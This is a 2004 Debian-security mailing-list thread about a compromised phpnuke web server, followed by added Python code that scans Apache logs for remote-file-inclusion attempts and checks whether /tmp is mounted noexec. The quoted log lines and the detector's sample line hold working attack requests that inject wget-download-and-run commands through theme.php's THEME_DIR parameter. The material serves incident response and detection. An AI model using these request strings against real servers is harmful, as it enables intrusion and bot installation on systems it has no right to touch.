
RE: Advice needed, trying to find the vulnerable code on Debian webserver.



Hi all,

I did a search in the logs on some of the suspicious users and found a
match.
The files that are being downloaded then executed seem to be IRC bots.
http://www.energymech.net/

Here are some log files.

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabela.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xzvf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

193.95.112.71 - - [18/Jun/2004:22:57:05 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabela.net/a.txt?&cmd=cd%20/tmp/;ps%20x HTTP/1.0" 200 8847 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

200.177.162.14 - - [21/May/2004:19:10:06 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.brooksequipment.com/newcmd.gif?&cmd=cd%20/tmp;%20wget%20200.177.162.14/bshell HTTP/1.1" 200 11813 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)"

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabela.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xzvf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"

193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabela.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xzvf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"


All those executables in the /tmp dir seem to be coming from that
site on our box; it's definitely the culprit.

Can someone explain what is going on here?
Because it doesn't make any sense.

The site in question is a phpnuke site with lots of modules.

What steps should I take now?

Thanks very much for everyone's help.



--
Ross
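
The log entries above show one pattern twice over: the THEME_DIR parameter of
theme.php is pointed at a file on a remote host (a remote file inclusion), and
a second, URL-encoded cmd parameter carries the shell commands that fetch and
start the bot. The script below is an added example, not code from the thread
or from any of the projects named in it; it parses Apache combined-log lines
and flags both traits so an admin can sweep a whole access log rather than
grep for one IP. The sample lines, host names and IPs in it are constructed
placeholders modelled on the entries in the post.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the combined-log entries in the post;
# hosts and IPs are placeholders, not the ones from the real logs.
SAMPLE_LOG = """\
10.0.0.1 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://attacker.example/a.txt?&cmd=cd%20/tmp/;wget%20attacker.example/fast.tgz;tar%20xzvf%20fast.tgz;./httpd HTTP/1.0" 200 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
10.0.0.2 - - [18/Jun/2004:23:01:10 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=default HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
10.0.0.3 - - [18/Jun/2004:23:02:00 +1000] "GET /modules.php?name=News&file=article&sid=12 HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
"""

# Apache combined log: ip ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Indicator 1: a parameter value that is itself a URL (remote file inclusion)
REMOTE_URL = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)
# Indicator 2: shell separators or command substitution inside a value
SHELL_META = re.compile(r'[;|`]|\$\(|&&|\|\|')
# Indicator 3: download-and-run tooling; only counted when the value has spaces
SHELL_WORDS = re.compile(r'\b(?:wget|curl|lynx|chmod|tar|uname|ps|cd)\b')


def parse_line(line):
    """Return the named fields of one combined-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def split_query(target):
    """Split a request target into (path, [(param, decoded_value), ...]).

    Splits on '&' only and decodes by hand: the injected value contains ';',
    which older versions of urllib.parse.parse_qsl also treat as a separator.
    """
    path, _, query = target.partition('?')
    pairs = []
    for chunk in query.split('&'):
        if not chunk:
            continue
        key, _, value = chunk.partition('=')
        pairs.append((unquote(key), unquote(value)))
    return path, pairs


def indicators_for(value):
    """Name the suspicious traits of one decoded parameter value."""
    found = []
    if REMOTE_URL.match(value):
        found.append('remote_include')
    if SHELL_META.search(value) or (SHELL_WORDS.search(value) and ' ' in value):
        found.append('shell_command')
    return found


def scan(log_text):
    """Scan combined-log text; return one finding per suspicious parameter."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path, pairs = split_query(rec['target'])
        for param, value in pairs:
            hits = indicators_for(value)
            if hits:
                findings.append({
                    'ip': rec['ip'], 'ts': rec['ts'], 'status': rec['status'],
                    'path': path, 'param': param, 'value': value,
                    'indicators': hits,
                })
    return findings


if __name__ == '__main__':
    # For a real sweep: scan(open('/var/log/apache/access.log').read())
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} {f['ts']} {f['path']} {f['param']}={f['value']!r}"
              f" -> {', '.join(f['indicators'])}")
```

A 200 status on a flagged line, as in the post, means the include actually
ran; a 404 or 500 on the same request is an attempt worth noting but not
evidence of compromise. Grouping the findings by source IP and by the
path that was hit gives the two things needed next: the module to remove or
patch, and the addresses to correlate with the files in /tmp.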

-----Original Message-----
From: Ross Tsolakidis 
Sent: Friday, 18 June 2004 9:20 AM
To: debian-security@lists.debian.org
Subject: RE: Advice needed, trying to find the vulnerable code on Debian
webserver.

Thanks to everyone who has responded.
I will be investigating all these options in the next few days; I'll
keep you all informed.


--
Ross

-----Original Message-----
From: Steve Kemp [mailto:steve@steve.org.uk] On Behalf Of Steve Kemp
Sent: Thursday, 17 June 2004 3:24 AM
To: list-help@riseup.net
Cc: Alvin Oga; debian-security@lists.debian.org
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
> > > 
> > > Install some rules for it to harden your webserver, see if 
> > > anything is flagged in the security log.
> > 
> > other web server testing tools
> > 	http://www.linux-sec.net/Web/#Testing
> 
> Has anyone actually used any of these to find the vulnerabilities that
> are being discussed?

  Not personally, I've used snort and some other custom logging code to
find exploit attempts in real time though.

  Can you tell us what CGI apps are installed upon the box?  Or do the
access logs show anything suspicious?  It's clear that Apache is the
route into the system if you have files owned by www-data - maybe
mounting /tmp noexec would help?

  (note: mounting /tmp noexec breaks apt often).

Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit
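
Steve's suggestion of mounting /tmp noexec is a cheap mitigation for exactly
the pattern in Ross's logs (drop a file in /tmp, then execute it), and it is
only effective if /tmp is its own mount and the option is actually applied.
The snippet below is an added example, not code from the thread; it reads a
/proc/mounts-style table and reports which of noexec, nosuid and nodev a
mount point lacks. The table it ships with is a constructed sample, not the
poster's box; for a live check replace it with the contents of /proc/mounts.

```python
# Constructed /proc/mounts excerpt (not from the poster's box). For a live
# check use: missing_hardening(open('/proc/mounts').read())
SAMPLE_MOUNTS = """\
/dev/sda1 / ext3 rw,errors=remount-ro 0 0
proc /proc proc rw,nosuid,nodev,noexec 0 0
/dev/sda3 /tmp ext3 rw,noexec,nosuid,nodev 0 0
"""

# The /etc/fstab line that produces the /tmp entry above would be:
#   /dev/sda3  /tmp  ext3  defaults,noexec,nosuid,nodev  0  2

WANTED = ('noexec', 'nosuid', 'nodev')


def mount_options(mounts_text, mountpoint):
    """Option set of the mount entry for `mountpoint`, or None if it is not its own mount.

    /proc/mounts fields: device mountpoint fstype options dump pass. Spaces in
    paths are escaped as \\040. The last matching line wins, as for the kernel.
    """
    opts = None
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        if fields[1].replace('\\040', ' ') == mountpoint:
            opts = set(fields[3].split(','))
    return opts


def missing_hardening(mounts_text, mountpoint='/tmp'):
    """Which of noexec/nosuid/nodev `mountpoint` lacks; all three if it is not separately mounted."""
    opts = mount_options(mounts_text, mountpoint)
    if opts is None:
        return list(WANTED)
    return [o for o in WANTED if o not in opts]


if __name__ == '__main__':
    gaps = missing_hardening(SAMPLE_MOUNTS)
    print('/tmp is fully hardened' if not gaps else f'/tmp is missing: {", ".join(gaps)}')
```

A /tmp that is merely a directory on the root filesystem inherits the root
options and so reports all three as missing, which is the usual state of a
default install. The apt breakage Steve mentions comes from package scripts
that unpack and run helpers under /tmp; the common workaround is to remount
exec for the duration of the upgrade (`mount -o remount,exec /tmp`) and back
to noexec afterwards, or to point those tools at a different temporary
directory.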




